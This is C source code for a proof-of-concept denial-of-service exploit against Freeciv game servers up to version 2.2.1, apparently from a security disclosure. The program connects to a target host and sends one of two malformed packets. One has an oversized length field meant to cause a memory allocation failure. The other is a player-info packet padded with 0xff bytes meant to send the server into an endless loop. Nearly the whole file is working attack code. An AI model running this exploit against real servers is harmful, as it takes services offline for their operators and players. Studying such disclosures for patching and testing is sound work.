/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        5556
#define BUFFSZ      0xffff  // max block size



int putcc(u8 *data, int chr, int size);
int putxx(u8 *data, u32 num, int bits);
int putss(u8 *data, u8 *str);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



#define JUMBO_SIZE  0xffff
enum packet_type {
    // I have cut the previouses, since not needed
    PACKET_GAME_INFO    = 15,
    PACKET_PLAYER_INFO  = 39,
    PACKET_EDIT_CITY    = 167,
    PACKET_EDIT_PLAYER_CREATE,
    PACKET_EDIT_PLAYER_REMOVE,
    PACKET_EDIT_PLAYER
};



int main(int argc, char *argv[]) {
    static struct   linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            bug;
    u16     port    = PORT;
    u8      *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    fputs("\n"
        "Freeciv <= 2.2.1 Denials of Service "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stderr);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%u)]\n"
            "\n"
            "Bugs:\n"
            " 1 = malloc exception\n"
            " 2 = endless loop\n"
            "\n", argv[0], port);
        exit(1);
    }
    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    p = buff;
    if(bug == 1) {
        p += putxx(buff, JUMBO_SIZE, 16);
        p += putxx(p, 0, 32);   // whole_packet_len, must be < 6
    } else if(bug == 2) {
        p += 2;
        *p++ = PACKET_PLAYER_INFO;  // PACKET_PLAYER_INFO, PACKET_GAME_INFO, PACKET_EDIT_PLAYER_CREATE, PACKET_EDIT_PLAYER_REMOVE. PACKET_EDIT_CITY, PACKET_EDIT_PLAYER
        p += putcc(p, 0xff, 100);
        putxx(buff, p - buff, 16);
    } else {
        printf("\nError: invalid bug number (%d)\n", bug);
        exit(1);
    }

    printf("- send malformed packet\n");
    send(sd, buff, p - buff, 0);

    if(!timeout(sd, 3)) recv(sd, buff, BUFFSZ, 0);
    close(sd);

    printf("\n- done, check the server manually\n");
    return(0);
}



int putcc(u8 *data, int chr, int size) {
    memset(data, chr, size);
    return(size);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }
    return(bytes);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str) + 1;
    memcpy(data, str, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            fprintf(stderr, "\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


